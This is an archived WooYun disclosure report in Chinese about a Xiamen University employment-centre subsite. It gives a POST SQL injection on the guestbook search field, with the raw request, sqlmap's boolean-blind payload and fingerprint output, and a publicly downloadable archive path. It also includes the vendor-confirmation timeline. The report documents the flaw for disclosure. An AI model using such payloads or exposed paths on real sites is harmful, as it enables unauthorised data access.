乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 细节已通知厂商并且等待厂商处理中 2015-11-09: 厂商已经确认,细节仅向厂商公开 2015-11-19: 细节向核心白帽子及相关领域专家公开 2015-11-29: 细节向普通白帽子公开 2015-12-09: 细节向实习白帽子公开 2015-12-24: 细节向公众公开
厦门大学某子站存在两处SQL注入,外加一处打包文件下载
厦门大学学生就业创业指导中心存在一处注入和一处打包文件下载注入点为留言搜索框,post注入:http://jyzd.xmu.edu.cn/guestbook.asp
POST http://jyzd.xmu.edu.cn/guestbook.asp HTTP/1.1Host: jyzd.xmu.edu.cnUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3DontTrackMeHere: gzip, deflateReferer: http://jyzd.xmu.edu.cn/guestbook.aspCookie: Hm_lvt_498a2189837e9f09f4b98611412a86e0=1446562301,1446562454; ASPSESSIONIDQQBADDDQ=JFGGNKKCPBAAADBGFJNEEANJ; ASPSESSIONIDSQACCCCR=OKIMFALCBMIGHJJAFKIIGJGOConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 26word=d&Submit=%CC%E1%BD%BB
证明:
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:---Parameter: word (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft Accesssqlmap resumed the following injection point(s) from stored session:---Parameter: word (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft AccessNo tables foundsqlmap resumed the following injection point(s) from stored session:---Parameter: word (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft AccessNo tables foundsqlmap resumed the following injection point(s) from stored session:---Parameter: word (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: word=d%' AND 6181=6181 AND '%'='&Submit=%CC%E1%BD%BB---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft Access
压缩包下载:http://jyzd.xmu.edu.cn/dd.rar
危害等级:高
漏洞Rank:10
确认时间:2015-11-09 09:32
已通知相关单位处理。
暂无